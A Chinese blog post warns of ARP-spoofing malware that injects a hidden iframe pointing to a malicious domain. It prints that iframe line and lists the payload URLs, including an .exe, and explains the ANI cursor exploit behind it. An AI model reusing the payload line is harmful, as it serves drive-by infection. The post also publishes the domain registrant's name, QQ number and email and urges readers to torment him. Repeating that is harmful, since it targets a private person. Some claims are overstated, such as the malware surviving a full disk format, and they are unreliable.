这阵子估计有不少人打开网页时，会发现在几乎所有网页源代码最开头部分被插入这样的一段代码：<iframe src=http://123.8w8w8w.com.cn/1234/help.htm width=50 height=0></iframe>，当打开163，sina等时同样会出现这段代码，不要大惊小怪，以为大网站都中毒了，实际情况是你自己的电脑或局域网中了ARP欺骗了。
    它可能会以其他的网址形式展现（如下）：
http://123.8w8w8w.com.cn/vip.htm
http://123.8w8w8w.com.cn/123/web.htm?id=003
http://123.8w8w8w.com.cn/help.htm
http://www.8w8w8w.com.cn/vip2.htm
http://123.8w8w8w.com.cn/520.exe
http://123.8w8w8w.com.cn/1234/help.htm
http://www.zpx520.com/0.htm
……
    网络上中此病毒者不计其数。

    中招后，在客户端的IE里自动插入这个网页木马：
<iframe src='http://123.8w8w8w.com.cn/help.htm' width=50 height=0></iframe>，后果是，造成无法浏览网页，特别是登陆不了网站后台，它已经转向了你在提交用户名和密码的地址，估计已经提交到他的数据库，此病毒如此恶毒。

    厉害的不是这些，任何杀软根本对他无法清除。他能利用局域网进行复制和传播，也就是说你本机把所有硬盘都格式化，对他也是不能清除，只要你有网络，他就能生存！公司几十台电脑，现在已经全部瘫痪了，到现在瑞星和卡卡全都死掉了，根本启动不了，对了，它和帕虫一样劫持所有杀软，怎么样？够可怕吧，而且，AV和帕虫的专杀对它一点作用都没有。
 
    所有的脚本打开失败，提示“当前页的脚本发生错误”，URL:http://123.8w8w8w.com.cn/1234/vip.htm

    归根到底，8w8w8w.com.cn网站是这一系列病毒的始作甬者，flymorn于是查询了这个域名的whois信息，如下：

Domain Name: 8w8w8w.com.cn
ROID: 20070430s10011s57361119-cn
Domain Status: ok
Registrant Organization: 李清
Registrant Name: 李清
Administrative Email: 90356@qq.com
Sponsoring Registrar: 北京新网互联科技有限公司
Name Server:ns.edong.com
Name Server:ns1.edong.com
Registration Date: 2007-04-30 02:48
Expiration Date: 2008-04-30 02:48

    显然，注册公司为新网互联，注册人是李清，他的QQ是90356，邮箱是90356@qq.com，大家有力气的话，去加这个QQ吧，去折磨他吧，痛恨的对象啊。

    言归正转，话拉回来。

    病毒是利用微软动态图标0-day漏洞（Exploit-ANIfile.c病毒），在一些网站上挂上木马，利用鼠标指针文件下载并运行恶意程序，当用户访问嵌入了恶意代码的网页，恶意程序将被自动下载到用户的IE临时目录并得到执行。然后整个网络就被指向到感染的网站，网络内的所有电脑访问的网页里都被首先加上<iframe src="木马网页"><iframe>。
    该漏洞存在于系统关键文件user32.dll中。当用户进入带有相关恶意代码的网页时，浏览器将会把这种畸形ANI文件下载到本机临时文件夹中，并依照网页脚本执行，将其设置为浏览此页面时鼠标的光标图案。如果这整个过程完成，则对于没有打上MS07-017补丁的电脑，此漏洞将被触发，黑客将可远程执行任意代码（一般是下载木马）。针对此情况，瑞星把这种畸形ANI文件列入查杀范围，命名Hack.SuspiciousAni。

   注意：当附近所有人的计算机都不能正常上网，出现qq掉线等情况时，您的电脑却安然无恙，数据通信正常，这说明您的机器已经中了arp病毒，需要及时杀毒，否则，与您相邻的计算机将无法上网，您的硬盘上的数据也有被窃取的危险，网络交易可能被盗窃财物，网络游戏可能被盗号、QQ等聊天软件可能号码丢失或者聊天记录被监视！

　　2007年4月4日凌晨，微软官方对ANI鼠标指针漏洞补丁更新
[1][2]

上一篇：硬盘的格式FAT32和NTFS区别 下一篇：解决GOOGLE该网站可能会损害您的计算机的方法